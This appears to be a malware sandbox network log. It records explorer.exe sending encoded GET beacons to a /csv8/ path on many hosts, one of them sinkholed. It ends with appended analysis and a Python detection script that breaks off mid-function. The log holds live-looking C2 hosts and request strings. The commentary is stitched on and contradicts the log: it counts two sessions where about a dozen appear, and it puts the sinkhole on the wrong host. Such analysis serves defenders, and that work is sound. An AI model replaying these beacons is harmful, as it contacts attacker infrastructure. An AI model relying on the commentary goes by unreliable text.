6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                            Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            11 | 192.168.2.3 | 49769 | 173.234.175.134 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Jan 13, 2021 21:06:02.573239088 CET | 10013 | OUT | GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1
                                                                            Host: www.travelnetafrica.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:06:02.767956018 CET | 10015 | IN | HTTP/1.1 500 Internal Server Error
                                                                            Cache-Control: private
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Server: Microsoft-IIS/8.5
                                                                            X-AspNet-Version: 4.0.30319
                                                                            X-Powered-By: ASP.NET
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Headers: *
                                                                            Access-Control-Allow-Methods: GET, POST
                                                                            Date: Wed, 13 Jan 2021 20:06:01 GMT
                                                                            Connection: close
                                                                            Content-Length: 4298
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e5 80 bc e4 b8 8d e8 83 bd e4 b8 ba 20 6e 75 6c 6c e3 80 82 3c 62 72 3e e5 8f 82 e6 95 b0 e5 90 8d 3a 20 69 6e 70 75 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 
61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 6e 61 76 79 3b 20 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 20 7d 0d
                                                                            Data Ascii: <!DOCTYPE html><html> <head> <title> null<br>: input</title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:pointer; }


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            12 | 192.168.2.3 | 49771 | 45.77.226.209 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Jan 13, 2021 21:06:18.190871000 CET | 10020 | OUT | GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1
                                                                            Host: www.fessusesefsee.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:06:18.245893002 CET | 10021 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 13 Jan 2021 20:17:53 GMT
                                                                            Server: X-SinkHole: Malware DNS SinkHole Server
                                                                            Content-Length: 307
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            13 | 192.168.2.3 | 49772 | 142.44.212.169 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Jan 13, 2021 21:06:23.388031960 CET | 10021 | OUT | GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1
                                                                            Host: www.queensboutique1000.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:06:24.072344065 CET | 10023 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Date: Wed, 13 Jan 2021 20:06:23 GMT
                                                                            Server: Apache
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            X-Redirect-By: WordPress
                                                                            Set-Cookie: wp_woocommerce_session_f594b69e16a4b5047a231fa253aa1f27=03992809e1dafa22878fd09f51a014ee%7C%7C1610741183%7C%7C1610737583%7C%7C40941839f9c3c2b52346de3c823ded95; expires=Fri, 15-Jan-2021 20:06:23 GMT; Max-Age=172800; path=/; HttpOnly
                                                                            Location: http://queensboutique1000.com/csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT
                                                                            Content-Length: 0
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=UTF-8


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            2 | 192.168.2.3 | 49756 | 142.44.212.169 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Jan 13, 2021 21:04:54.974946022 CET | 9649 | OUT | GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1
                                                                            Host: www.queensboutique1000.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:04:55.720679045 CET | 9649 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Date: Wed, 13 Jan 2021 20:04:55 GMT
                                                                            Server: Apache
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            X-Redirect-By: WordPress
                                                                            Set-Cookie: wp_woocommerce_session_f594b69e16a4b5047a231fa253aa1f27=b7bae79cc80ddaa5594beaf6bd33068b%7C%7C1610741095%7C%7C1610737495%7C%7Cc55af832d2d4108ede2bccf91945ac5e; expires=Fri, 15-Jan-2021 20:04:55 GMT; Max-Age=172800; path=/; HttpOnly
                                                                            Location: http://queensboutique1000.com/csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT
                                                                            Content-Length: 0
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=UTF-8


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            3 | 192.168.2.3 | 49758 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Jan 13, 2021 21:05:00.634299994 CET | 9662 | OUT | GET /csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT HTTP/1.1
                                                                            Host: www.studentdividers.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:05:00.772897959 CET | 9665 | IN | HTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Wed, 13 Jan 2021 20:05:00 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "5ffc83a2-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            4 | 192.168.2.3 | 49759 | 192.0.78.208 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Jan 13, 2021 21:05:05.893126011 CET | 9679 | OUT | GET /csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT HTTP/1.1
                                                                            Host: www.logansshop.net
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:05:05.933063984 CET | 9679 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Server: nginx
                                                                            Date: Wed, 13 Jan 2021 20:05:05 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 162
                                                                            Connection: close
                                                                            Location: https://logansshop.net/csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT
                                                                            X-ac: 2.hhn
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            5 | 192.168.2.3 | 49760 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Jan 13, 2021 21:05:11.046991110 CET | 9682 | OUT | GET /csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT HTTP/1.1
                                                                            Host: www.epicmassiveconcepts.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:05:11.186150074 CET | 9682 | IN | HTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Wed, 13 Jan 2021 20:05:11 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "5ffc8399-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            6 | 192.168.2.3 | 49761 | 192.155.166.181 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Jan 13, 2021 21:05:22.236080885 CET | 9684 | OUT | GET /csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT HTTP/1.1
                                                                            Host: www.exit-divorce.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:05:22.461457014 CET | 9684 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 13 Jan 2021 20:05:22 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 1.0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            7 | 192.168.2.3 | 49765 | 205.134.254.189 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Jan 13, 2021 21:05:27.905106068 CET | 9818 | OUT | GET /csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT HTTP/1.1
                                                                            Host: www.splendidhotelspa.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:05:28.102826118 CET | 9819 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.19.3
                                                                            Date: Wed, 13 Jan 2021 20:05:28 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Content-Length: 236
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 6f 72 20 72 65 2d 6e 61 6d 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 77 65 62 20 73 69 74 65 20 6f 77 6e 65 72 20 66 6f 72 20 66 75 72 74 68 65 72 20 61 73 73 69 73 74 61 6e 63 65 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <html><head><title>Error 404 - Not Found</title><head><body><h1>Error 404 - Not Found</h1><p>The document you are looking for may have been removed or re-named. Please contact the web site owner for further assistance.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            8 | 192.168.2.3 | 49766 | 146.148.193.212 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Jan 13, 2021 21:05:38.638372898 CET | 9992 | OUT | GET /csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT HTTP/1.1
                                                                            Host: www.stnanguo.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:05:38.823584080 CET | 9993 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 13 Jan 2021 20:05:38 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 146
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 9   Source IP: 192.168.2.3   Source Port: 49767   Destination IP: 23.105.124.225   Destination Port: 80   Process: C:\Windows\explorer.exe

Timestamp: Jan 13, 2021 21:05:44.419821978 CET   kBytes transferred: 9994   Direction: OUT
GET /csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT HTTP/1.1
Host: www.alparmuhendislik.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
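Both sessions above have the same shape: explorer.exe, which has no business originating HTTP on its own, sends a GET to a single-directory path (/csv8/) carrying one long base64-alphabet blob and one short tag as query parameters, with Connection: close, to two different hosts in quick succession. The 404 from nginx on the first host is not evidence the request was harmless; the report flags the server as sinkholed, and the client simply moves on to the next host. The Python below is an added example, not part of the report or of any Joe Sandbox tooling: it parses request heads like the two shown, scores them against those indicators, and lists the Host values of everything flagged. The two malicious records reproduce the report's request lines; the benign third record, the browser.exe path and the SYSTEM_HTTP_CLIENTS set are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed records modelled on the two HTTP sessions above: the originating
# process and the request head exactly as the report shows it. The third record
# is a hypothetical benign request added for contrast; it is not from the report.
SESSIONS = [
    {
        "process": r"C:\Windows\explorer.exe",
        "request": "GET /csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT HTTP/1.1\r\n"
                   "Host: www.stnanguo.com\r\nConnection: close\r\n\r\n",
    },
    {
        "process": r"C:\Windows\explorer.exe",
        "request": "GET /csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT HTTP/1.1\r\n"
                   "Host: www.alparmuhendislik.com\r\nConnection: close\r\n\r\n",
    },
    {
        "process": r"C:\Program Files\Browser\browser.exe",  # hypothetical benign client
        "request": "GET /index.html?lang=en HTTP/1.1\r\nHost: www.example.com\r\n"
                   "Connection: keep-alive\r\n\r\n",
    },
]

# Images that should not originate HTTP themselves; the report attributes both
# beacons to explorer.exe. Extend this set for your own environment.
SYSTEM_HTTP_CLIENTS = {"explorer.exe"}

ONE_DIR_PATH = re.compile(r"^/[A-Za-z0-9_-]{2,16}/$")   # e.g. /csv8/
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")   # long base64-alphabet blob


def parse_request(raw: str) -> dict:
    """Split an HTTP request head into method, path, query pairs and headers.
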